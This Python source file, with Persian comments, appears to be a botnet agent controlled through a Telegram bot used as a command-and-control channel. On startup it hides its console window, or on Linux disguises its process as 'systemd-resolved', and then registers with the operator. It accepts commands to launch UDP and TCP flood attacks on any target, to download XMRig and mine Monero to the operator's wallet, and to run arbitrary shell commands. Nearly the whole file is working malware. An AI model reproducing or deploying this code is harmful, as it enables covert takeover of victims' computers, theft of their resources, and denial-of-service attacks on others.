import os import sys import subprocess import time import threading import socket import uuid import requests import json import ctypes import random import platform import logging import tempfile from datetime import datetime from typing import Optional, Dict, Any

========== تنظیمات ==========

BOT_TOKEN_AGENT = "YOUR_AGENT_BOT_TOKEN" GROUP_CHAT_ID = -1001234567890 AGENT_SECRET = "MySecretKey123" GROUP = "linux" if platform.system() == "Linux" else "windows" AGENT_ID = str(uuid.uuid4())[:8]

logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(name)

========== لایه Protocol (هماهنگ با C2) ==========

class Protocol: @staticmethod def encode_message(msg_type: str, data: Any = None, agent_id: str = None) -> str: if agent_id is None and data and 'agent_id' in data: agent_id = data['agent_id'] payload = { "type": msg_type, "id": str(uuid.uuid4()), "timestamp": datetime.now().isoformat(), "agent_id": agent_id, "data": data or {} } return json.dumps(payload)

@staticmethod
def decode_message(text: str) -> Optional[Dict]:
    try:
        msg = json.loads(text)
        if not all(k in msg for k in ['type', 'id', 'timestamp']):
            return None
        return msg
    except json.JSONDecodeError:
        # پشتیبانی از پیام‌های قدیمی (فقط برای دستورات ساده)
        if text.startswith("/"):
            return {
                "type": "COMMAND",
                "id": str(uuid.uuid4()),
                "timestamp": datetime.now().isoformat(),
                "agent_id": None,
                "data": {"raw": text}
            }
        return None

========== لایه Transport (ارتباط با Telegram) ==========

class TelegramTransport: def init(self, token: str, group_id: int): self.token = token self.group_id = group_id self._last_update_id = 0

def send(self, text: str) -> bool:
    url = f"https://api.telegram.org/bot{self.token}/sendMessage"
    payload = {"chat_id": self.group_id, "text": text}
    try:
        resp = requests.post(url, json=payload, timeout=10)
        if resp.status_code == 200:
            logger.debug(f"Message sent: {text[:50]}")
            return True
        else:
            logger.error(f"Failed to send: {resp.status_code} - {resp.text}")
            return False
    except Exception as e:
        logger.error(f"Send error: {e}")
        return False

def receive(self) -> list:
    url = f"https://api.telegram.org/bot{self.token}/getUpdates"
    params = {"timeout": 30, "offset": self._last_update_id + 1 if self._last_update_id else None}
    try:
        resp = requests.get(url, params=params, timeout=35)
        if resp.status_code == 200:
            data = resp.json()
            if data.get('ok'):
                if data['result']:
                    self._last_update_id = data['result'][-1]['update_id']
                return data['result']
        return []
    except Exception as e:
        logger.error(f"Receive error: {e}")
        return []

========== لایه Status ==========

class AgentStatus: def init(self, agent_id: str): self.agent_id = agent_id self.status = "INITIALIZING" self.details = "Starting up" self.last_error = None

def set_running(self):
    self.status = "RUNNING"
    self.details = "Agent is operational"

def set_failed(self, error: str):
    self.status = "FAILED"
    self.details = error
    self.last_error = error

def set_stopped(self):
    self.status = "STOPPED"
    self.details = "Agent stopped"

def get_status(self) -> Dict:
    return {"status": self.status, "details": self.details}

========== لایه Monitoring ==========

class SystemMonitor: @staticmethod def get_system_info() -> str: try: import psutil info = [ f"OS: {platform.system()} {platform.release()}", f"Hostname: {socket.gethostname()}", f"CPU Cores: {psutil.cpu_count()}", f"RAM: {round(psutil.virtual_memory().total / (10243), 2)} GB", f"Disk: {round(psutil.disk_usage('/').total / (10243), 2)} GB", f"CPU Usage: {psutil.cpu_percent()}%", f"RAM Usage: {psutil.virtual_memory().percent}%" ] return "\n".join(info) except ImportError: return f"OS: {platform.system()} {platform.release()}\nHostname: {socket.gethostname()}" except Exception as e: return f"Error: {e}"

========== لایه Command Handlers ==========

class CommandHandlers: def init(self, transport: TelegramTransport, status: AgentStatus, agent_id: str): self.transport = transport self.status = status self.agent_id = agent_id self.mining_process = None self.ddos_thread = None self.stop_ddos = False self.wallet = "44AFFq5kSiGBoZ...FakeAddress" self.xmrig_path = None self.xmrig_installed = False

def _send_result(self, message: str):
    msg = Protocol.encode_message("RESULT", {"message": message}, agent_id=self.agent_id)
    self.transport.send(msg)

def _send_heartbeat(self):
    msg = Protocol.encode_message("HEARTBEAT", {}, agent_id=self.agent_id)
    self.transport.send(msg)

def execute_cmd(self, cmd: str) -> str:
    try:
        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, timeout=30)
        return output.decode('utf-8', errors='ignore')
    except subprocess.TimeoutExpired:
        return "Command timed out after 30s"
    except Exception as e:
        return str(e)

def install_miner(self):
    if self.xmrig_installed and self.xmrig_path and os.path.exists(self.xmrig_path):
        self._send_result("Miner already installed")
        return

    logger.info("Downloading XMRig...")
    temp_dir = tempfile.gettempdir()
    if platform.system() == "Windows":
        url = "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip"
        zip_path = os.path.join(temp_dir, "xmrig.zip")
        try:
            r = requests.get(url, stream=True)
            with open(zip_path, 'wb') as f:
                for chunk in r.iter_content(chunk_size=8192):
                    f.write(chunk)
            import zipfile
            with zipfile.ZipFile(zip_path, 'r') as zf:
                zf.extractall(temp_dir)
            for root, _, files in os.walk(temp_dir):
                for file in files:
                    if file.lower() == "xmrig.exe":
                        self.xmrig_path = os.path.join(root, file)
                        self.xmrig_installed = True
                        self._send_result("Miner installed successfully")
                        return
        except Exception as e:
            logger.error(f"Failed to install miner: {e}")
            self._send_result(f"Miner installation failed: {e}")
            return
    else:
        url = "https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz"
        tar_path = os.path.join(temp_dir, "xmrig.tar.gz")
        try:
            r = requests.get(url, stream=True)
            with open(tar_path, 'wb') as f:
                for chunk in r.iter_content(chunk_size=8192):
                    f.write(chunk)
            import tarfile
            with tarfile.open(tar_path, 'r:gz') as tar:
                tar.extractall(temp_dir)
            for root, _, files in os.walk(temp_dir):
                for file in files:
                    if file == "xmrig":
                        self.xmrig_path = os.path.join(root, file)
                        os.chmod(self.xmrig_path, 0o755)
                        self.xmrig_installed = True
                        self._send_result("Miner installed successfully")
                        return
        except Exception as e:
            logger.error(f"Failed to install miner: {e}")
            self._send_result(f"Miner installation failed: {e}")
            return

def start_mining(self):
    if not self.xmrig_installed or not self.xmrig_path:
        self._send_result("Miner not installed. Installing...")
        self.install_miner()
        if not self.xmrig_installed:
            return

    if self.mining_process and self.mining_process.poll() is None:
        self._send_result("Mining already running")
        return

    pool = "pool.supportxmr.com:3333"
    cmd = [self.xmrig_path, "-o", pool, "-u", self.wallet, "-p", "x", "--keepalive"]
    try:
        self.mining_process = subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        self.status.set_running()
        self._send_result("Mining started")
        logger.info("Mining started")
    except Exception as e:
        logger.error(f"Failed to start mining: {e}")
        self.status.set_failed(str(e))
        self._send_result(f"Mining failed: {e}")

def stop_mining(self):
    if self.mining_process and self.mining_process.poll() is None:
        try:
            self.mining_process.terminate()
            self.mining_process = None
            self.status.set_stopped()
            self._send_result("Mining stopped")
            logger.info("Mining stopped")
        except Exception as e:
            logger.error(f"Failed to stop mining: {e}")
            self._send_result(f"Failed to stop mining: {e}")
    else:
        self._send_result("Mining already stopped")

def start_ddos(self, target: str, port: int, duration: int):
    if self.ddos_thread and self.ddos_thread.is_alive():
        self._send_result("DDoS already running")
        return

    def ddos_attack():
        self.stop_ddos = False
        logger.info(f"Starting DDoS on {target}:{port} for {duration}s")
        # UDP flood
        def udp_flood():
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            payload = random._urandom(1024)
            end_time = time.time() + duration
            while time.time() < end_time and not self.stop_ddos:
                try:
                    sock.sendto(payload, (target, port))
                except:
                    pass
            sock.close()

        # TCP flood
        def tcp_flood():
            end_time = time.time() + duration
            while time.time() < end_time and not self.stop_ddos:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.settimeout(1)
                    s.connect((target, port))
                    s.close()
                except:
                    pass

        threads = []
        for _ in range(5):
            t = threading.Thread(target=udp_flood)
            t.daemon = True
            t.start()
            threads.append(t)
            t = threading.Thread(target=tcp_flood)
            t.daemon = True
            t.start()
            threads.append(t)

        time.sleep(duration)
        self.stop_ddos = True
        for t in threads:
            t.join(timeout=1)
        self._send_result(f"DDoS finished on {target}:{port}")
        logger.info(f"DDoS finished on {target}:{port}")

    self.ddos_thread = threading.Thread(target=ddos_attack)
    self.ddos_thread.daemon = True
    self.ddos_thread.start()
    self._send_result(f"DDoS started on {target}:{port} for {duration}s")

def handle_command(self, raw_command: str):
    parts = raw_command.strip().split()
    if not parts:
        return
    cmd = parts[0].lower()

    if cmd == "/ddos" and len(parts) >= 4:
        self.start_ddos(parts[1], int(parts[2]), int(parts[3]))
    elif cmd == "/mine" and len(parts) >= 2:
        if parts[1] == "on":
            self.start_mining()
        elif parts[1] == "off":
            self.stop_mining()
        else:
            self._send_result("Invalid mine state")
    elif cmd == "/setwallet" and len(parts) >= 2:
        self.wallet = parts[1]
        self._send_result(f"Wallet updated to {parts[1]}")
    elif cmd == "/install_miner":
        self.install_miner()
    elif cmd == "/miner_status":
        status = "Installed" if self.xmrig_installed else "Not installed"
        running = " - Running" if (self.mining_process and self.mining_process.poll() is None) else " - Stopped"
        self._send_result(f"Miner status - {status}{running}")
    elif cmd == "/report_system":
        self._send_result(f"System Report\n{SystemMonitor.get_system_info()}")
    elif cmd == "/report_mining":
        status = "Running" if (self.mining_process and self.mining_process.poll() is None) else "Stopped"
        pid = self.mining_process.pid if self.mining_process else "None"
        self._send_result(f"Mining Report\nWallet: {self.wallet}\nStatus: {status}\nPID: {pid}")
    elif cmd == "/kill":
        self.stop_mining()
        if self.ddos_thread and self.ddos_thread.is_alive():
            self.stop_ddos = True
            self.ddos_thread.join()
        self._send_result("Killed")
        logger.info("Agent killed")
        sys.exit(0)
    else:
        output = self.execute_cmd(raw_command)
        self._send_result(f"Command output: {output}")

========== مخفی‌سازی ==========

def hide_agent(): if platform.system() == "Windows": try: ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0) except: pass else: try: libc = ctypes.CDLL("libc.so.6") libc.prctl(15, ctypes.c_char_p(b"systemd-resolved"), 0, 0, 0) except: pass

========== حلقه اصلی ==========

def main(): logger.info(f"Starting agent: {AGENT_ID}") transport = TelegramTransport(BOT_TOKEN_AGENT, GROUP_CHAT_ID) status = AgentStatus(AGENT_ID) handlers = CommandHandlers(transport, status, AGENT_ID)

hide_agent()

# ارسال ثبت‌نام با پروتکل جدید
register_msg = Protocol.encode_message(
    "REGISTER",
    data={"agent_id": AGENT_ID, "group": GROUP, "secret": AGENT_SECRET},
    agent_id=AGENT_ID
)
transport.send(register_msg)
status.set_running()
logger.info("Agent registered and running")

while True:
    try:
        updates = transport.receive()
        for update in updates:
            message = update.get('message')
            if not message:
                continue
            text = message.get('text')
            if not text:
                continue
            if message.get('from', {}).get('is_bot', False):
                continue

            decoded = Protocol.decode_message(text)
            if not decoded:
                continue
            if decoded.get('type') == 'COMMAND':
                raw_cmd = decoded.get('data', {}).get('raw', '')
                if raw_cmd:
                    handlers.handle_command(raw_cmd)

        # ارسال Heartbeat با پروتکل جدید
        heartbeat_msg = Protocol.encode_message("HEARTBEAT", {}, agent_id=AGENT_ID)
        transport.send(heartbeat_msg)
        time.sleep(30)

    except Exception as e:
        logger.error(f"Main loop error: {e}")
        time.sleep(10)

if name == "main": main()